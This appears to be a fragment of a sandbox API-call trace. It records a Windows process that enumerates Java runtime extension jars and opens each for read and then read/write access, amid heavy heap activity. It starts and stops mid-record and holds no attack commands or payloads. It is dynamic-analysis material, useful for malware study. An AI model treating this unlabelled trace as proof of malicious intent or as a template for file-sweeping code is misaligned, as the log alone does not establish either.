0x76200 [0096.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0096.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.239] AreFileApisANSI () returned 1 [0096.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar", lpUsedDefaultChar=0x0) returned 53 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.239] AreFileApisANSI () returned 1 [0096.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0096.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 53 [0096.239] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.240] GetFileType (hFile=0x368) returned 0x1 [0096.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0096.240] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.240] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.241] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.241] CloseHandle (hObject=0x368) returned 1 [0096.241] AreFileApisANSI () returned 1 [0096.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0096.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 53 [0096.241] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.241] GetFileType (hFile=0x368) returned 0x1 [0096.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0096.241] CloseHandle (hObject=0x368) returned 1 [0096.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.242] AreFileApisANSI () returned 1 [0096.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0096.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 53 [0096.242] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa4c9)) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.243] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x44661, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sunjce_provider.jar", cAlternateFileName="SUNJCE~1.JAR")) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0096.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0096.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.244] AreFileApisANSI () returned 1 [0096.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar", lpUsedDefaultChar=0x0) returned 63 [0096.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.244] AreFileApisANSI () returned 1 [0096.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0096.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e250 [0096.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 63 [0096.244] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.502] GetFileType (hFile=0x418) returned 0x1 [0096.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0096.503] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.503] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.503] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.503] CloseHandle (hObject=0x418) returned 1 [0096.503] AreFileApisANSI () returned 1 [0096.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0096.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e2d8 [0096.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 63 [0096.503] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.504] GetFileType (hFile=0x418) returned 0x1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0096.504] CloseHandle (hObject=0x418) returned 1 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0096.505] AreFileApisANSI () returned 1 [0096.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0096.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 63 [0096.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x44661)) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.505] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7fbb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sunmscapi.jar", cAlternateFileName="SUNMSC~1.JAR")) returned 1 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, 